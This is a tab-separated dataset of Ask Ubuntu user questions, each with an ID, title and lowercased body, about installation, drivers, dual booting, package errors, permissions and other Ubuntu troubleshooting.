410836	how to find my lost ubuntu laptop ?	i am running ubuntu on my laptop . in case if i lose my laptop or it gets stolen , is there any way to locate it ? do i have to install any application beforehand to find my laptop ?
410838	is steam safe ? it has its own repositories	i installed steam , but saw it uses its own repositories for upgrading , and i do n't know if it is safe to do so . thanks .
410840	why do elements from toolbar appear unactive ?	recently i updated ubuntu 13.10 ( small updates ... but many ) , after it finished i found this problem in many programas ( filezilla , sublimetext , inkscape , gimp ) for instance , if i go on the toolbar to `` file '' i ca n't click `` save '' or `` save as '' , however i can save what i 'm doing using ctrl+s have you ever had this problem ?
410842	replacing ubuntu with windows 8.1	i am trying to wipe out ubuntu 13.10 from my laptop and install windows 8.1 instead . i formatted my hard drive and deleted the old partition . now when i try and boot i get this error : error : no such partition entering rescue mode grub rescue > has anyone else had issues with this ? how do i reset it to install windows ?
410844	is there some safe ps2 emulator for ubuntu ?	i want to emulate a ps2 in ubuntu , i 've seen there is an emulator , called pcsx2 , but it 's not in the software centre , so i do n't know if it 's safe or if there is another one .
410845	how to add more storage to ubuntu server 12.04 for my website ?	my main hard drive is being used both as the installation and for my website is there a way ubuntu can use the second hard drive for my website ? do i have to copy my website to the new drive ? if yes is it going to be difficult ? ls -l /etc/apache2/sites-enabled/ total 0 lrwxrwxrwx 1 root root 26 jan 26 2013 000-default - > ../sites-available/default lrwxrwxrwx 1 root root 28 jan 27 2013 wordpress - > ../sites-available/wordpress
410848	can i install ubuntu without losing windows 8 ?	i have a lenovo ideapad u410 laptop running windows 8.1 . i tried ubuntu from a live usb and i liked it so much that i think i want to replace it as my os . i have two questions : if i install ubuntu completely , will i still keep windows/all my windows data ? how can i import my windows data to ubuntu ? ( photos , videos , documents , apps , etc . ) also , how good is libre open office ? is it worth trying to re-install the windows office suite ? thanks : )
410849	how to transfer downloads , updates and other application from one online system to another offline system	i have installed ubuntu in one laptop , i have another 2 desktops , but i do n't want to download updates and other applications again and again . i do n't known much about command line so please help me in step by step how to transfer downloads , updates and other application from one online system to another offline system
410854	optical drive issue	just loaded ubuntu 12.04 on my lenovo 3000 n200 laptop . it does not recognize the optical drive . any ideas ?
410856	ssd suddenly extremely slow ( 50x slower )	i 'm using a ssd for about 460gb of data on an ubuntu 12.04 server . ( the drive holds 560gb , so it is about 88 % full . ) i have had a program which does a lot of random access to the data ( no writing ) , which i last ran ( normally ) a few days ago . when i ran it yesterday , it was suddenly significantly slower than before . the program just does random access to the drive . previously i could do about 5000 random lookups per second ; now i 'm only getting about 100 . this is slower than doing random access to a hdd . ( i benchmarked a few problems last year . ) the only thing i 've done recently was to install gcc 4.7 and to upgrade all my packages . but , i tried compiling everything with clang and did n't see a difference . the drive is formatted as ext4 with the only options being errors=remount-ro . i tried rebooting the machine and trimming the device but it did n't change things . profiling the code shows it is spending all its time in open , close and mmap calls . ( note that i 'm not calling mmap directly -- i 'm using all c-style fopen fseek and fread calls . ) any idea what could cause this ? i could re-format the drive if there was a chance it would help . edit : here is some benchmark data on a 2tb hdd and the 500gb ssd sudo hdparm -tt /dev/sdb1 /dev/sdb1 : timing cached reads : 6814 mb in 2.00 seconds = 3410.05 mb/sec timing buffered disk reads : 458 mb in 3.00 seconds = 152.45 mb/sec sudo hdparm -tt /dev/sdc1 /dev/sdc1 : timing cached reads : 6890 mb in 2.00 seconds = 3447.93 mb/sec timing buffered disk reads : 780 mb in 3.01 seconds = 259.36 mb/sec here is the output from smartctl : === start of information section === model family : intel 320 series ssds device model : intel ssdsa2cw600g3 serial number : cvpr140004b7600fgn lu wwn device id : 5 001517 9596df196 firmware version : 4pc10362 user capacity : 600,127,266,816 bytes [ 600 gb ] sector size : 512 bytes logical/physical device is : in smartctl database [ for details use : -p show ] ata version is : 8 ata standard is : ata-8-acs revision 4 local time is : sun jan 26 16:46:53 2014 mst smart support is : available - device has smart capability . smart support is : enabled === start of read smart data section === smart overall-health self-assessment test result : passed general smart values : offline data collection status : ( 0x00 ) offline data collection activity was never started . auto offline data collection : disabled . self-test execution status : ( 0 ) the previous self-test routine completed without error or no self-test has ever been run . total time to complete offline data collection : ( 1 ) seconds . offline data collection capabilities : ( 0x75 ) smart execute offline immediate . no auto offline data collection support . abort offline collection upon new command . no offline surface scan supported . self-test supported . conveyance self-test supported . selective self-test supported . smart capabilities : ( 0x0003 ) saves smart data before entering power-saving mode . supports smart auto save timer . error logging capability : ( 0x01 ) error logging supported . general purpose logging supported . short self-test routine recommended polling time : ( 1 ) minutes . extended self-test routine recommended polling time : ( 1 ) minutes . conveyance self-test routine recommended polling time : ( 1 ) minutes . sct capabilities : ( 0x003d ) sct status supported . sct error recovery control supported . sct feature control supported . sct data table supported . smart attributes data structure revision number : 5 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 3 spin_up_time 0x0020 100 100 000 old_age offline - 0 4 start_stop_count 0x0030 100 100 000 old_age offline - 0 5 reallocated_sector_ct 0x0032 100 100 000 old_age always - 0 9 power_on_hours 0x0032 100 100 000 old_age always - 17833 12 power_cycle_count 0x0032 100 100 000 old_age always - 13 170 reserve_block_count 0x0033 100 100 010 pre-fail always - 0 171 program_fail_count 0x0032 100 100 000 old_age always - 0 172 erase_fail_count 0x0032 100 100 000 old_age always - 0 183 runtime_bad_block 0x0030 100 100 000 old_age offline - 0 184 end-to-end_error 0x0032 100 100 090 old_age always - 0 187 reported_uncorrect 0x0032 100 100 000 old_age always - 0 192 unsafe_shutdown_count 0x0032 100 100 000 old_age always - 5 199 udma_crc_error_count 0x0030 100 100 000 old_age offline - 0 225 host_writes_32mib 0x0032 100 100 000 old_age always - 3236658 226 workld_media_wear_indic 0x0032 100 100 000 old_age always - 4973 227 workld_host_reads_perc 0x0032 100 100 000 old_age always - 65 228 workload_minutes 0x0032 100 100 000 old_age always - 1067143 232 available_reservd_space 0x0033 100 100 010 pre-fail always - 0 233 media_wearout_indicator 0x0032 096 096 000 old_age always - 0 241 host_writes_32mib 0x0032 100 100 000 old_age always - 3236658 242 host_reads_32mib 0x0032 100 100 000 old_age always - 6437718 smart error log version : 1 no errors logged smart self-test log structure revision number 1 no self-tests have been logged . [ to run self-tests , use : smartctl -t ] note : selective self-test log revision number ( 0 ) not 1 implies that no selective self-test has ever been run smart selective self-test log data structure revision number 0 note : revision number not 1 implies that no selective self-test has ever been run span min_lba max_lba current_test_status 1 0 0 not_testing 2 0 0 not_testing 3 0 0 not_testing 4 0 0 not_testing 5 0 0 not_testing selective self-test flags ( 0x0 ) : after scanning selected spans , do not read-scan remainder of disk . if selective self-test is pending on power-up , resume after 0 minute delay . [ edit : i 'm continuing to work on this in the background . when i do resolve it , i will post something here . ]
410857	drivers for amd radeon 7670 ubuntu 13.10	will ubuntu automatically install amd radeon hd 7670 driver and does it support amd catalyst control manager ?
410860	how to permanently set cpu power management to the powersave governor ?	i 'm currently using this : cpupower frequency-set -- governor powersave but it resets after each reboot .
410861	ubuntu 3.13 kernel update not working	i started on linux a week ago . my friend hooked me up with it and i started with kernel 3.10 . i 'm trying to update to 3.13 , but when i try to install it through the terminal it wo n't go past 3.11 . what would be the easiest way to diagnose the problem and get it updated properly ? i might mention that my graphics card is an r9 280x , but my system wo n't recognize it , it says i have a 7970 .
410862	attempting to install ubuntu 12.04.03 lts does not detect windows 8.1 on dell xps 8500	( edit midway down ) my dell xps 8500 is about a year old , purchased new . it came with windows 8 , which i upgraded to 8.1 via the windows store . i 've disabled hibernate completely , and fast start , and secure boot . uefi is still enabled . there 's an intel rst application , but to my knowledge , there is no ssd in this machine . i do n't know why this application is there , but i do n't want to remove it in case something needs it . the only internal drive is gpt , 2 tb , and has several partitions ( efi , three recovery partitions , an oem partition , windows , two partitions i made for the windows swap file and my user data , and some unformatted partitions i intended to install ubuntu to , and lots of unused space ) when i boot , i press f12 . this presents me the option to choose the normal boot process , or booting from the usb . if i boot to the usb , ubuntu runs . i 'm presented some options . the first one starts ubuntu . in ubuntu , i can view the efi directory in terminal , so it is booting the right way . i can also use gparted to view the disk , and it mostly agrees with windows disk manager , except it also identifies a `` msftres '' partition that windows does n't tell me about , and a tiny 3 mib unallocated space that windows also does n't tell me about . it correctly identifies the fat32 efi partition , and the ntfs windows partitions i use ( os , swap file , and data ) . if i choose the second option ( install ubuntu ) instead , it says i can proceed with the install ( enough space and network ) . then it seems to scan my drives . but i 'm only presented with two choices : erase everything ( which seems dangerous to have as the default ) and `` something else '' . it fails to detect windows . edit : i disagree with the assessment that this is a duplicate ( or at least that the one provided is the duplicate ) . the information needed to make that assessment ( hardware configuration , os versions , attempted solutions , etc . ) is already in the post . the solutions in the other article did not work for me , perhaps for the same reasons , or perhaps not . the only one i had not tried was defragmentation , but i have done that now . it was at 9 % , and remains at 9 % fragmented . to do better , i may have to purchase something . there 's plenty of free space ( 30 % ) . still , i took this opportunity to remove my off-topic comment about windows 8.1 which was out of place . as to my question , i may have found a solution elsewhere , and i wanted to run it by people here before committing to it , since i have almost no experience with installing any form of linux onto anything , much less alongside windows . it looks like someone here also found this solution , as an answer for at dual boot ubuntu 12.10 and windows 8 dell inspiron 15 r if i launch ubuntu from the usb stick , and then open a terminal window to start ubiquity manually as `` winosdata=true ubiquity '' then it does offer me three options in the installer : install alongside , overwrite , or something else . it does identify the os as windows 8 ( or 8.1 , i forget ) but it calls it something like `` windows 8 ( data ) '' . i 'll be choosing something else , but ... i 'm not actually sure what the winosdata variable is for , or what it means to find a windows os `` ( data ) '' . what is it telling me ? my concern is that if i go ahead and use this method , and the install succeeds , maybe i could end up in a situation where windows wo n't be found after reboot , sending me to ubuntu directly . i mean , could the installer 's difficulty in finding windows mean that the boot mechanism will also have this problem ? how could i avoid or fix that ? i 've heard the whole range from people who say there 's no trouble installing on dell xps 8500 , to people who say that ubuntu will never install on it . so ... eager , but also a little hesitant .
410865	automatic bitrate conversion for ipod sync using rhythmbox	is there a way to configure an automatic conversion of the bitrate when syncing to my ipod ? i want all songs above 128 kbps to get converted to 128 kbps .
410866	trying to install ssh2	i have a vps running ubuntu 10.04 lts and i just installed ssh2 extension but when i ran the command php -m |grep ssh2 it gave error saying php warning : php startup : unable to load dynamic library '/opt/php5/lib/php/extensions/no-debug-non-zts-20090626/pdo.so ' - /opt/php5/lib/php/extensions/no-debug-non-zts-20090626/pdo.so : can not open shared object file : no such file or directory in unknown on line 0 php warning : php startup : unable to load dynamic library '/opt/php5/lib/php/extensions/no-debug-non-zts-20090626/ssh2.so ' - /opt/php5/lib/php/extensions/no-debug-non-zts-20090626/ssh2.so : can not open shared object file : no such file or directory in unknown on line 0 anyone know how to fix this ? i run nginx and php 5.3.20
410871	add another layout in lubuntu	i want to type in hindi in lubuntu , so i can use it in google chrome .
410875	ubuntu 13.10ďźca n't output audio to lcd tv through hdmi	i just setup a htpc with gigabyte motherboard ( ga-j1800n-d2h ( rev . 1.0 ) ) , linkage : http : //www.gigabyte.us/products/product-page.aspx ? pid=4881 # sp . when i connected pc to tv with hdmi , the graphic displayed well , but no round could be heart . i tried sound setting and definitely chose hdmi output , but the sound did n't come back .
410878	how can i create a new ubuntu desktop environement/window manager ?	many times i asked myself : how can i create a new ubuntu desktop environement/window manager ? there are listed a lot of them , but how can i create a new one ? what are steps to create an ubuntu desktop environement/window manager ?
410879	kyocera hydro edge c5215 ubuntu phone	i have followed the steps for turning my phone into an ubuntu phone and i have hit a wall . i performed the step : phablet-flash ubuntu-system -- channel devel -- bootstrap and i received this message : info : phablet-flash : device detected as c5215 error : phablet-flash : unsupported device , autodetect fails device does this mean my phone is incapable of obtaining the ubuntu os ? i have researched the matter on-line but i have n't been able to get passed this wall . any help or advice would be appreciated . thank you . richard
410880	why did my computer 's ubuntu installation screw up after fixing not being able to login because of no disk space left ( 100 % used up ) ?	seriously , i want to see some answers on this question , so if you will , please refrain from not answering this question if you know ( or think you know ) what went on with my computer . i 'm tired of seeing my questions go unanswered . i was using my computer as i normally do , when my computer ( ubuntu + kde ) notified me that i was running low on available disk space ( since my linux install is only 30 gb ) . because of the message , i was going to go through my installed programs/games/files a bit later to get rid of anything that i have on my ubuntu install that i do n't use or can do without . i was doing some system setting changes , changing my splash screen and decided to restart my computer . upon returning to the login screen ( kdm ) , it informed me that basically there was not enough free space to log me in to my ubuntu installation on my computer . i thought to myself `` wtf ? ! ? ! ? '' . so basically , my first thought was to grab my copy of puppy linux that i already had on a live cd , pop it into my computer and go through any pictures/music/downloads that i had on my computer i do n't really need or can easily get back ( from another drive i have ) , then go back and see if doing that was enough to be able to log in . sure enough it was and i was able to log in . so then as i logged in and this is where i started experiencing odd problems with kde . first off , i had no window decorations/borders ( window title bar with the minimize , maximize , close buttons ) , unable to type anything within the terminal ( keyboard not working with he terminal ) , and most of the time could n't type anything in the search box in the kickoff application launcher . luckily , i had cairo dock which i was extremely fortunate that i was able to use my keyboard with it 's terminal . my fist thought of why i had no window decorations/borders/title bar was because kwin was simply not running and needed to be restarted . so naturally i typed into to cairo dock 's terminal `` kwin -- replace '' , it informed me that `` the program 'kwin ' is currently not installed . you can install it by typing : sudo apt-get install kde-window-manager '' . first off i was completely and utterly puzzled as to why it said that kwin was n't installed . how ? ! ? ! ? how could it not be installed when it came with kde and i have never uninstalled it ! so after typing in the command to install kwin , everything is back to it was before i was experiencing this problem . i later uninstalled some games in wine that i no longer needed to have installed in ubuntu ( because i have them on my windows installation ) and freed up more disk space . so here are my questions : how can i set up ubuntu with kde ( or ubuntu in general if desktop environments do n't matter in this case ) so that my computer will never run `` low enough '' on disk space that i will be unable to login ? why was i unable to use my keyboard with kde 's terminal ? how on earth did kwin get uninstalled from my kde installation when i did absolutely nothing to the installation of kwin that came with kde by default ?
410884	translation confusion - ( the number of milliseconds sticky edges are deactivated for after the barrier has been broken )	so i am helping to translate ubuntu . in unity , i struggled to translate this : the number of milliseconds sticky edges are deactivated for after the barrier has been broken . may i ask , what is the `` barrier '' ?
410886	installing ubuntu 12.04 lts	i have a separate machine dell 1545 laptop . i was wondering how to have a full install using 12.04 lts on my vista machine ? can i just put the burned iso disc in the disc tray and restart then go into bios- selecting boot from cd or is it more different than that ? i do not want to dual boot ! thanks .
410887	not work on 3g operator beeline	good afternoon . when using os ubuntu touch on the nexus 4 russian users are faced with a problem , does not work on 3g operator beeline . on the other operators all works well . if you look at where the recorded file serviceproviders.xml apn operators , the errors we found . beeline beeline * 102 # 3g modem usb- modem beeline beeline 212.44.130.6 217.118.83.6 mobile phone mobile beeline beeline 217.118.66.243 217.118.66.244 what do you advise to solve the problem ? in many file serviceproviders.xml apn belline and they are all different ( for different regions ) . sorry for my english . sincerely shilyaev alexandr shilyaev79 @ gmail.com
410889	how to install picasa with wine	whenever i try to install picasa with wine it get this , mr-yeomans @ mryeomans-dell-de051 : ~ $ wine ~/picasa39-setup.exe fixme : wininet : internetlockrequestfile stub fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! wine : unhandled page fault on read access to 0x00000008 at address 0x7e5585e3 ( thread 0029 ) , starting debugger ... winedbg : internal crash at 0x7e8685e3 mr-yeomans @ mryeomans-dell-de051 : ~ $ i do n't know where to go on this .
410890	installing on a windows 7 pc	when i download wubi , i go through the installation process and it tells me to reboot to complete it . so i reboot , it goes into the ubuntu loading screen , but after maybe 30 seconds , a line of messages come up saying it gave up waiting for it to start and it couldnt find the root device ? any help would be great thanks . : )
410893	not able to launch rundeck in ubuntu 12.04	not able to launch rundeck in ubuntu 12.04 downloaded jar and ran the jar please help me to resolve this issue . its running fine in windows machine , shiva @ nandu : ~/downs/jan-2013 $ java -jar rundeck-launcher-1.6.2\ \ ( 1\ ) .jar warning : https is not enabled , specify -drundeck.ssl.config=/home/shiva/downs/jan- 2013/server/config/ssl.properties to enable . 2014-01-08 00:09:15.103 : :info : logging to stderr via org.mortbay.log.stderrlog 2014-01-08 00:09:15.168 : :info : jetty-6.1.21 2014-01-08 00:09:15.791 : :info : no jsp support for / , did not find org.apache.jasper.servlet.jspservlet 2014-01-08 00:09:17.920 : / : info : initializing spring root webapplicationcontext 2014-01-08 00:09:20,494 error contextloader - context initialization failed org.springframework.beans.factory.beancreationexception : error creating bean with name 'pluginmanager ' defined in servletcontext resource [ /web-inf/applicationcontext.xml ] : invocation of init method failed ; nested exception is java.lang.nullpointerexception : can not invoke method getat ( ) on null object at com.dtolabs.rundeck.runserver.run ( runserver.java:101 ) at com.dtolabs.rundeck.runserver.main ( runserver.java:64 ) at com.dtolabs.rundeck.expandrunserver.invokemain ( expandrunserver.java:690 ) at com.dtolabs.rundeck.expandrunserver.execute ( expandrunserver.java:647 ) at com.dtolabs.rundeck.expandrunserver.run ( expandrunserver.java:304 ) at com.dtolabs.rundeck.expandrunserver.main ( expandrunserver.java:113 ) caused by : java.lang.nullpointerexception : can not invoke method getat ( ) on null object ... 6 more 2014-01-08 00:09:20.521 : :warn : failed startup of context org.mortbay.jetty.webapp.webappcontext @ 1e3e1014 { / , /home/shiva/downs/jan-2013/server/exp/webapp } org.springframework.beans.factory.beancreationexception : error creating bean with name 'pluginmanager ' defined in servletcontext resource [ /web-inf/applicationcontext.xml ] : invocation of init method failed ; nested exception is java.lang.nullpointerexception : can not invoke method getat ( ) on null object at com.dtolabs.rundeck.runserver.run ( runserver.java:101 ) at com.dtolabs.rundeck.runserver.main ( runserver.java:64 ) at com.dtolabs.rundeck.expandrunserver.invokemain ( expandrunserver.java:690 ) at com.dtolabs.rundeck.expandrunserver.execute ( expandrunserver.java:647 ) at com.dtolabs.rundeck.expandrunserver.run ( expandrunserver.java:304 ) at com.dtolabs.rundeck.expandrunserver.main ( expandrunserver.java:113 ) caused by : java.lang.nullpointerexception : can not invoke method getat ( ) on null object ... 6 more 2014-01-08 00:09:20.522 : :warn : nested in org.springframework.beans.factory.beancreationexception : error creating bean with name 'pluginmanager ' defined in servletcontext resource [ /web-inf/applicationcontext.xml ] : invocation of init method failed ; nested exception is java.lang.nullpointerexception : can not invoke method getat ( ) on null object : java.lang.nullpointerexception : can not invoke method getat ( ) on null object at com.dtolabs.rundeck.runserver.run ( runserver.java:101 ) at com.dtolabs.rundeck.runserver.main ( runserver.java:64 ) at com.dtolabs.rundeck.expandrunserver.invokemain ( expandrunserver.java:690 ) at com.dtolabs.rundeck.expandrunserver.execute ( expandrunserver.java:647 ) at com.dtolabs.rundeck.expandrunserver.run ( expandrunserver.java:304 ) at com.dtolabs.rundeck.expandrunserver.main ( expandrunserver.java:113 )
410896	`` distribution failed '' error when running intel linux graphics installer	i am receiving a `` distribution failed '' error message anytime i try and run the linux intel graphics installer , either manually or through the terminal . this happens on a fresh install as well . as a result i can not update the intel driver to correlate with any kernel update at all . thus my system crashes and wo n't even make it past the boot up splash screen . is there a fix to allow the installer to update the graphics , even on a fresh install ? i am currently utilizing kubuntu . i do n't think i can utilize any linux distro without being able to update the graphics to correlate with a kernel update . i have tried a fresh install many times and still get the same error and the same result of a system crash no matter what . i may like to try a linux distro such as ubuntu , lubuntu or something similiar but without being able to update the intel graphics every time a kernel update is involved i feel i am out of luck . if anyone has a solution i would be very appreciative . thank you for any assistance .
410899	remove calendar on kde desktop	there is a calendar on my desktop , i do n't know how it got there , what it is or how to remove it . it 's seen in the upper left corner in this screen shot : any help on what it is or how to remove it would really be appreciated !
410901	ubuntu tweak does not start ( gtk-warning ** : locale not supported by c library )	i recently reinstalled my ubuntu 12.04 . the main idea was to not disturb files on /home , and i succeeded by reinstalling ubuntu only on / partition . when i got back i found everything working but not ubuntu-tweak . i have found many advices such as reinstalling `` compiz '' or adding older repositories bot none have worked . when i start ubuntu-tweak in terminal i receive long bundle of code which i do n't really understand . i feel it would say important things but i just can not read it properly . i simply love ubuntu-tweak software and i would like to have it up and running just as before system swap . there is my problem : fahrenheit @ fahrenheit-1225c : ~ $ ubuntu-tweak ( ubuntu-tweak:3173 ) : gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale . traceback ( most recent call last ) : file `` /usr/bin/ubuntu-tweak '' , line 122 , in < module > from ubuntutweak.main import ubuntutweakwindow file `` /usr/lib/python2.7/dist-packages/ubuntutweak/main.py '' , line 40 , in < module > from ubuntutweak.preferences import preferencesdialog file `` /usr/lib/python2.7/dist-packages/ubuntutweak/preferences.py '' , line 32 , in < module > from ubuntutweak.factory import widgetfactory file `` /usr/lib/python2.7/dist-packages/ubuntutweak/factory.py '' , line 24 , in < module > from ubuntutweak.gui.widgets import * file `` /usr/lib/python2.7/dist-packages/ubuntutweak/gui/widgets.py '' , line 10 , in < module > from ubuntutweak.settings.compizsettings import compizsetting file `` /usr/lib/python2.7/dist-packages/ubuntutweak/settings/compizsettings.py '' , line 3 , in < module > import ccm file `` /usr/lib/python2.7/dist-packages/ubuntutweak/settings/ccm/__init__.py '' , line 1 , in < module > from conflicts import * file `` /usr/lib/python2.7/dist-packages/ubuntutweak/settings/ccm/conflicts.py '' , line 25 , in < module > from constants import * file `` /usr/lib/python2.7/dist-packages/ubuntutweak/settings/ccm/constants.py '' , line 77 , in < module > locale.setlocale ( locale.lc_all , `` '' ) file `` /usr/lib/python2.7/locale.py '' , line 539 , in setlocale return _setlocale ( category , locale ) locale.error : unsupported locale setting
410903	how to know the libass version already installed and how to update it	how can i know the current version of libass installed and how can i update it to the latest or how can i install it from scratch ? i have ubuntu 13.10 and sm player installed , and i 'm facing some problem in rendering ass files with smplayer and i 'm trying to figure out the cause of this problem any help ?
410909	uninstall google chrome built-in plugins	is there a way to turn off permanently the plugins inside chrome ? especially , i am interested in the flash and video plugins . this causes a huge overload on my internet , and it would be great if someone could suggest a way to uninstall or permanently turn-off these plugins . update : i am specifically looking for a way to permanently disable the plugin with no way of resuscitation . i am dealing with hard data caps , so under no circumstance do i want any content to be played by others using the system . i know this sounds strange , but please help me out ! thank you in advance !
410914	why ca n't i install ubuntu-sdk	i am not able to install the ubuntu sdk on my pc . i get this error in terminal : e : unable to locate package ubuntu-sdk how could i overcome this issue ?
410919	is it possible to run windows for one user and ubuntu for another user simultaneously ?	can i install two os on my pc without harming it . i was thinking maybe ubuntu latest verion to install . i already have windows 7 home installed on my pc . i would like to know if i can keep win 7 on one user and ubuntu on another . in this way i can switch user in between . but i do n't want to harm my pc in any way or corrupt some files . thank you
410920	error deploying services in juju local	after following all the guides , i 've managed to configure juju in the local environment inside a virtualbox guest machine , but after deploying any service ( wordpress , juju-gui ) , they load to the point where i get a local ip address , but they get stuck in pending status . when i check the logs , it shows this error in every service : error juju runner.go:211 worker : exited `` uniter '' : modeinstalling { service-name } : git init failed : exec : `` git '' : executable file not found in $ path . i tried to apt-get git but it did n't work ... updated info : the host os is os x mavericks , virtualbox is 4.3.6 using bridged networking , ubuntu is the latest ubuntu cloud 13.10 . in order to install everything , first i had to add more repositories to the system ( universe , multiverse , etc . ) , then i did an apt-get juju-local , afterwards i had to create a new bridge in order to add my local ethernet interface to the lxc container ( replaced lxcbr0 with br0 ) and configure lxc and the juju local config to use it . then i bootstraped , deployed and exposed a couple of services ( juju-gui , wordpress ) and now i 'm stuck in the situation with the error . iâ´ve pinged my host machine and external ip and i get connectivity , so i assume thatâ´s not the issue . update ii : doing more tests i found out the error is that the containers do n't have internet connection , i can ping the host but not the router or any other node in the network , thus while trying to download the dependecies , in this case git , they fail to load . so the question would be how to setup lxc containers with virtualbox bridge network connection . it 's similar to this http : //unix.stackexchange.com/questions/70597/using-a-bridge-an-lxc-container-cant-ping-router-but-the-host-os-can but i can ping the laptop and i 'm using a briged network instead of nat
410927	add `` open as administrator '' option to folders ?	is there a way to add `` open as administrator '' , when i right-click on a folder , because there are some folders you can not access graphically because that would need administrator privileges ?
410931	how to fix this error ?	reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/rs.archive.ubuntu.com_ubuntu_dists_precise_main_i18n_translation-en e : the package lists or status file could not be parsed or opened .
410934	ssh -x : xio : fatal io error 14 ( bad address ) on x server	when `` ssh -x '' was executed between remote computer ( ubuntu 13.04 ) and local computer ( ubuntu 13.04 ) , the error was displayed as shown below . xio : fatal io error 14 ( bad address ) on x server `` localhost:13.0 '' after 1401 requests ( 1401 known processed ) with 5 events remaining . anyone know how to solve the error ?
410935	how to upload images in wordpress ?	i 'm new to ubuntu and wordpress . when i 'm trying to upload image in wordpress its says unable to create directory localhost/2014/01 . is its parent directory writable by the server ?
410936	network icon suddenly disappeared from the notification area on ubuntu 13.04	i am using ubuntu 13.04 and there is problem with network icon . it suddenly hide from top-right corner of the screen and disconnect with wifi-internet . i also restart the network-manager service by using terminal like : sudo service network-manager restart but i am fail to show it again on the tray . the output for cat /etc/network/interfaces is : # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback i reboot my system to re-connect with the internet . this is awful and time consuming . please if anyone know about solution , guide me how i reach to solve it . tkanks
410938	after installing ubuntu 13.10 all files erased	i just install ubuntu 13.10 by following instruction but after downloading and installing all updates i cant find my files , its been format or deleted . i want to know why did it happen ?
410941	how do i link my eth1 network card to my dns ?	on my linux machine how should i configure my eth1 network card to work with my ddclient duc ? it ca n't use a static ip address because my router does n't support it , but all i can find is the configuration for static addresses ? i want the eth1 network card to be the public address and my eth0 to be my private one for a dns . i do n't currently have eth1 set up , but this is my config : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet dhcp post-up iptables-restore < /etc/iptables.up.rules
410943	install ubuntu on osx mavericks with refind problems	my issue is that after an installation of refind that appears to complete successfully , the bootmanager does n't show up therefore meaning i am unable to install ubuntu of a disk . please can someone tell me is they had this problem and , if so , how to fix it .
410944	share ubuntu printers with virtualbox windows	i need share printers from ubuntu with windows installed on same host as virtuabox i have problem , that in new ubuntu ( unity ) did n't exists settings cups deamon which i found here http : //www.gammatwo.com/2009/08/28/share-printers-from-ubuntu-host-and-virtualbox-windows-guest/ http : //www.gammatwo.com/wp-content/uploads/2009/08/ubuntu_share_printers_03.png i try to connect administration or add printer in windows or show administration , but all is forbidden for all hosts out of localhost
410945	plymouth boot you linux with a video	im trying to make a video for the boot splash , like i saw virpara user create a splash animation that show several images in order of the word `` ubuntu '' so create a animated sequence . the url of the video is http : //www.youtube.com/watch ? v=zpo50gm3txu im trying whith the code of this plymouth animated put a simple animated splash that are 3 images with the numbers 1,2,3 in each image and show all time the sequence 1,2,3 at the boot but is impossible to me . someone wants to help ? best regards .
410946	option for grep only non-default processes and services ?	is there any option for grep only non default processes and services ? i know how show all of this and export to file , but manual reading and deleting line by line is not ideal . : - ) thanks for your answer .
410947	permission denied in ftp even though i 'm the owner	okay , so i 've tried my best at finding the answer to this by searching and looking through possible duplicates , but i just ca n't so forgive me if it 's out there somewhere anyways . my issue is as follows . i 've set the owner of /var/www to myuser : www-data and permissions of the folder and all ( currently just the basic index.html ) it 's content to 750 , and apache seems to run it as supposed , but i ca n't access it when i ftp into the server as the myuser user . i mean , i can access it , but as soon as i try to edit , delete or add something i just get 500 permission denied , and if i try to edit the permissions i get 500 unknown site command . help ! what do i do wrong ? the idea on setting the user and group , and then the permissions as above was from a good friend of mine who is sort of an expert , but i feel like i 'm bothering him when i ask so many questions , so if you can help me some more , that would be great ! i 'm trying to put a backup with 4 vhosts back into the www-folder , but what i put there should n't be of any concern , right ? that 's just the confing of the vhosting later that has got anything to do with that , right ? thanks in advance ! added info : i ran this : myuser @ myserver : / $ groups myuser and got this : myuser : myuser adm cdrom sudo dip plugdev lpadmin sambashare then i ran this : myuser @ myserver : / $ groups www-data and got this : www-data : www-data and then this : myuser @ myserver : /var/www $ ls -l and got this : total 4 -rwxr-x -- - 1 tjita1 www-data 177 jan 25 17:45 index.html regarding the ftpserver , i did n't do anything in particular , i just installed vsftpd . oh yeah , i also added a line in i think /etc/vsftpd.conf or something like that , that reads something like this : chmod_enable=yes . also , i ca n't get those 4-space-indents to work , sorry about that..
410953	2 alt tab selection styles ubuntu 12.04	so i have 2 alt tab styles at the same time , and it is annoying . as i can not take a screenshot of this moment here is a video record : http : //www.youtube.com/watch ? v=vj3f2ctslam what could issue this behaviour ?
410954	issues when installing adobe acrobat reader	actually i 'm trying to install the acro reader on my 13.10 ubuntu desktop . i have activated the canonical repositoy ( already availble in my software packages ) by ticking the checkbox but when opening the ubuntu software center and pointing to canonical partners i ca n't see the acrobat reader package but only 5 packages available : client for skype voip and instant messaging service . gtk+ control panel for adobe flash player plugin version 11 . client for skype voip and instant messaging service -binary files . kde control panel adobe flash player plugin version 11 . adobe flash player plugin version 11 . i 've already updated my packages sources through sudo apt-get install update and even tried to install it from terminal sudo apt-get install acroread but i got message showing no packages found . so am i missing some step around this ? any help will be greatly appreciated . br .
410955	why netscape portable runtime library	as an ubuntu user , we often have updates . today i saw an update titled `` netscape portable runtime library '' and the file was tagged libnspr4 . the only thing i can relate it to is firefox but i 'm not sure . so why does ubuntu need a netscape project component when netscape is long gone and used to be commercial ?
410961	full remove eclipse	i have installed eclipse 3.8 from the terminal in ubuntu 13.10 , but i ca n't open it from the launcher . the command : ubuntu_menuproxy= eclipse can open it , but i can not install windows builder plug-in , and it shows this message : can not complete the install because one or more required items could not be found . i also can not install android . so what can i do ?
410963	is there a way to put comments in the youtube-dl batch file ?	let 's suppose you want to make a long list of urls but separated with a comment which indicates what the urls are about . is there a way to do it ?
410964	jokosher gstreamer error	newbie alert ! i am currently looking for some audio multi tracking software , find out `` jokosher '' looks good and simply to use . but i have a problem , every time i import and try to play some audio footage , i got an error `` a gstreamer error has occurred `` . anyone knows how to fix this ? i have tried to find this problem on google without any success , i have installed gstreamer plug-ins ugly , bad and nice , as suggested on one forum , but the problem persists . i am using xubuntu 12.04 installed via wubi.exe on my windows 7 . thanks .
